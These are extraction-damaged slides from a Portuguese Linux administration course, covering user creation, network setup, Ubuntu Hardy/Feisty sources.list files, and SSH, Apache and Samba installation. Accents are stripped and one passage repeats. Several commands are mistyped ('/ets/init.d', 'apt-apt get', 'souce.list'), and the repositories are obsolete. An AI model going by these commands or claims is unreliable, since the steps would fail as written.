,A migrao de um servidor proxy para Linux requer o uso de vrios programas separados para que se tenha um resultado profissional. Isto pode parecer incomodo no comeo, mas voc logo perceber que a diviso de servios entre programas mais produtivo. Quando desejar substituir um deles, o funcionamento dos outros no sero afetados. No vou entrar em detalhes sobre os programas citados ao lado, mas o squid um servidor proxy Web (HTTP e HTTPS) completo e tambm apresenta um excelente servio FTP. Possui outros mdulos como dns, ping, restries de acesso, limites de tamanho de arquivos, cache, etc. Sem comentrios... todas so ferramentas para de grandes Web Sites. O wdm, gerao de contedo por exemplo, usado na gerao (http://www.debian.org) em 30 idiomas diferentes.

MS Frontpage

Mozilla e muitas outras ferramentas para a gerao WEB (como zope, do site da distribuio Debian php3, php4, wdm, htdig) Sem equivalente

MS Winsock

O Linux tem suporte nativo a tcp/ip desde o comeo de sua existncia e no precisa de nenhuma camada de comunicao entre ele e a Internet. A performance aproximadamente 10% maior em conexes Internet via fax-modem e outras redes tcp/ip. Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan disponibilizam verses para Linux,com o objetivo principal de remoo de vrus em servidores de E-mail ou servidores de arquivos, com o objetivo de no contaminar os vulnerveis sistemas Windows, servindo como uma efetiva barreira de defesa na rede. 297

AVG, Viruscan, Clamavis, AVG , FPROT, CPAV.

AVG, Viruscan, Clamavis, AVG , F-PROT, CPAV

Comparao dos Programas do Windows x Linux


Windows
Wingate, MS Proxy kerio

Linux
Squid, Apache Ip masquerade, nat, diald, exim,

Diferenas
,A migrao de um servidor proxy para Linux requer o uso de vrios programas separados para que se tenha um resultado profissional. Isto pode parecer incomodo no comeo, mas voc logo perceber que a diviso de servios entre programas mais produtivo. Quando desejar substituir um deles, o funcionamento dos outros no sero afetados. No vou entrar em detalhes sobre os programas citados ao lado, mas o squid um servidor proxy Web (HTTP e HTTPS) completo e tambm apresenta um excelente servio FTP. Possui outros mdulos como dns, ping, restries de acesso, limites de tamanho de arquivos, cache, etc. Sem comentrios... todas so ferramentas para de grandes Web Sites. O wdm, gerao de contedo por exemplo, usado na gerao (http://www.debian.org) em 30 idiomas diferentes.

MS Frontpage

Mozilla e muitas outras ferramentas para a gerao WEB (como zope, do site da distribuio Debian php3, php4, wdm, htdig) Sem equivalente

MS Winsock

O Linux tem suporte nativo a tcp/ip desde o comeo de sua existncia e no precisa de nenhuma camada de comunicao entre ele e a Internet. A performance aproximadamente 10% maior em conexes Internet via fax-modem e outras redes tcp/ip. Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan disponibilizam verses para Linux,com o objetivo principal de remoo de vrus em servidores de E-mail ou servidores de arquivos, com o objetivo de no contaminar os vulnerveis sistemas Windows, servindo como uma efetiva barreira de defesa na rede. 298

AVG, Viruscan, Clamavis, AVG , FPROT, CPAV.

AVG, Viruscan, Clamavis, AVG , F-PROT, CPAV

Criao de Usurios
j sudo adduser <nome_user> j sudo passwd <nome_user> j cat /etc/passwd j cat /etc/group

Exerccio: Crie um usurio com o seu nome, e um grupo chamado aula. Associe o usurio ao grupo aula e depois ao grupo virtual

$sudo adduser <nome> $sudo addgroup aula $vi /etc/group $vi /etc/passwd
299

Configurao de rede
j

1. Descubra o modelo de sua placa de rede, digite: # lspci O resultado de ser algo como: Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev8b) 2. Agora veja em que eth o seu sistema identificou a placa, se for uma nica placa de rede provavelmente eth0. Use o comando: # cat /var/log/messages | egrep "eth" O resultado dever ser: Oct 20 11:18:55 fw2 kernel: eth0: VIA VT6105 Rhine-III at 0xec00, 00:xx:xx:xx:xx:xx, IRQ 5. 3. Beleza, sabendo que sua placa uma VIA Rhine, carregue o mdulo referente. # vi /etc/modules Coloque o seguinte: alias eth0 via-rhine.ko

300

Configurao de rede
4. Vamos editar o arquivo que verificado quando o servio de rede iniciado: # vi /etc/network/interfaces Coloque a seguinte linha neste arquivo para ip dinmico: auto eth0 iface eth0 inet dhcp ou o seguinte linhas para ip fixo: auto eth0 iface eth0 inet static address 192.168.0.1 network 192.168.254.254 broadcast 192.168.0.255 gateway 192.168.0.254 5. Para iniciar o servio de rede execute o comando: # invoke-rc.d network start

301

Configurao de rede
j

s testar agora: # ping 192.168.254.35 PING 192.168.254.35 (192.168.254.35) 56(84) bytes of data. 64 bytes from 192.168.254.35: icmp_seq=0 ttl=64 time=0.262 ms 64 bytes from 192.168.254.35: icmp_seq=1 ttl=64 time=0.102 ms 64 bytes from 192.168.254.35: icmp_seq=2 ttl=64 time=0.155 ms 6. Para confirmar se sua interface est ativa digite: # ifconfig Se estive ok deve mostrar: eth0 Encapsulamento do Link: Ethernet Endereo de HW 00:xx:xx:xx:xx:xx inet end.: 192.168.0.1 Bcast:192.168.0.255 Masc:255.255.255.0 UP BROADCASTRUNNING MULTICAST MTU:1500 Mtrica:1 pacotes RX:13951137 erros:0 descart.:0 sobrepos.:0 quadro:0 pacotes TX:9849100 erros:0 descart.:0 sobrepos.:0 portadora:0 colises:0 txqueuelen:1000 RX bytes:4069140904 (1.6 Mb) TX bytes:1802073588 (8.5 Mb) IRQ:10 Endereo de E/S:0xde00 7. No esquea de colocar o servio para ser iniciado toda vez que ligar a mquina. Use o comando: # update-rc.d -f network defaults
302

Configurao de servios
j Editar o arquivo souce.list
- vi /etc/apt/souce.list
# Ubuntu supported packages deb http://us.archive.ubuntu.com/ubuntu hardy main restricted deb-src http://us.archive.ubuntu.com/ubuntu hardy restricted main multiverse universe deb http://us.archive.ubuntu.com/ubuntu hardy-updates main restricted deb-src http://us.archive.ubuntu.com/ubuntu hardy-updates restricted main multiverse universe deb http://security.ubuntu.com/ubuntu hardy-security main restricted deb-src http://security.ubuntu.com/ubuntu hardy-security restricted main multiverse universe # Ubuntu community supported packages deb http://us.archive.ubuntu.com/ubuntu hardy universe multiverse deb http://us.archive.ubuntu.com/ubuntu hardy-updates universe multiverse deb http://security.ubuntu.com/ubuntu hardy-security universe multiverse # Ubuntu backports project deb http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse deb-src http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse deb http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe deb-src http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe

303

Sources.list para a famlia Ubuntu Feisty Fawn # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http://br.archive.ubuntu.com/ubuntu/ feisty main restricted deb-src http://br.archive.ubuntu.com/ubuntu/ feisty main restricted ## Major bug fix updates produced after the final release of the ## distribution. deb http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## universe WILL NOT receive any review or updates from the Ubuntu security ## team. deb http://br.archive.ubuntu.com/ubuntu/ feisty universe deb-src http://br.archive.ubuntu.com/ubuntu/ feisty universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http://br.archive.ubuntu.com/ubuntu/ feisty multiverse deb-src http://br.archive.ubuntu.com/ubuntu/ feisty multiverse ## Uncomment the following two lines to add software from the 'backports' ## repository. ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. deb http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse deb http://security.ubuntu.com/ubuntu feisty-security main restricted deb-src http://security.ubuntu.com/ubuntu feisty-security main restricted deb http://security.ubuntu.com/ubuntu feisty-security universe deb-src http://security.ubuntu.com/ubuntu feisty-security universe deb http://security.ubuntu.com/ubuntu feisty-security multiverse deb-src http://security.ubuntu.com/ubuntu feisty-security multiverse

304

Configurao de servios
j Apt-get update j Apt-get upgrade j Apt-get install <pacote ou servio>

305

Instalao do SSH
j sudo apt-apt get update j sudo apt-get install openssh-server j vi /etc/ssh/sshd_config j sudo /etc/init.d/ssh restart j Putty free e winscp

306

Instalao do Apache
j sudo apt-get install apache2 j Verificar o Local da pasta Base:

sudo vi /etc/apache2/sites-available/default - Alterar o DocumentRoot de /var/www/ para /var/www/site2/


j Copiar o site do seu micro para a

/var/www/ (colocar primeiro na sua pasta home e depois usar o comando sudo cp R /home/virtual/site2 /var/www/
307

Instalao do Apache
inicial, no nosso caso ser acrescentar o index.htm, isto dentro do diretrio /etc/apache2/httpd.conf sudo i /etc/apache2/httpd.conf <IfModule dir_module> DirectoryIndex index2.htm index.html index.htm index.shtml index.php index.php5 index.php4 index.php3 index.phtml index.cgi </IfModule>
j Alterar o arquivo de procurar do nome

308

Instalao do samba
j apt-get install samba j Editar o arquivo /etc/samba/smb.conf

vi /etc/samba/smb.conf
j Reinicializar o servio

sudo /ets/init.d/samba restart


309

[global] workgroup = AULA netbios name = SRV-AULA # server string = %h server (Samba, Ubuntu) server string = #---------------------------------------------# kernel oplocks = no socket options = TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=8192 SO_SNDB$ #-----------------------------------------------passdb backend = tdbsam security = user username map = /etc/samba/smbusers name resolve order = wins bcast hosts domain logons = yes preferred master = yes wins support = yes
310

#============== Share Definitions ================== [printers] comment = All Printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 #nome do compartilhamento [arquivos] comment = Pasta Publica path = /arquivos valid users = teste #force group = users create mask = 0660 directory mask = 0771 writable = yes
311

Configurao de Servio (Grfico)

312

Configurao de Servio (Grfico)

313

Se voc no pode proteger o que tem, voc no tem nada.


Annimo

Fim do Curso. Dvidas

Reflexo:
Os computadores so incrivelmente rpidos, precisos e burros; os homens so incrivelmente lentos, imprecisos e brilhantes; juntos, seu poder ultrapassa os limites da Imaginao Albert Einstein
315

Você também pode gostar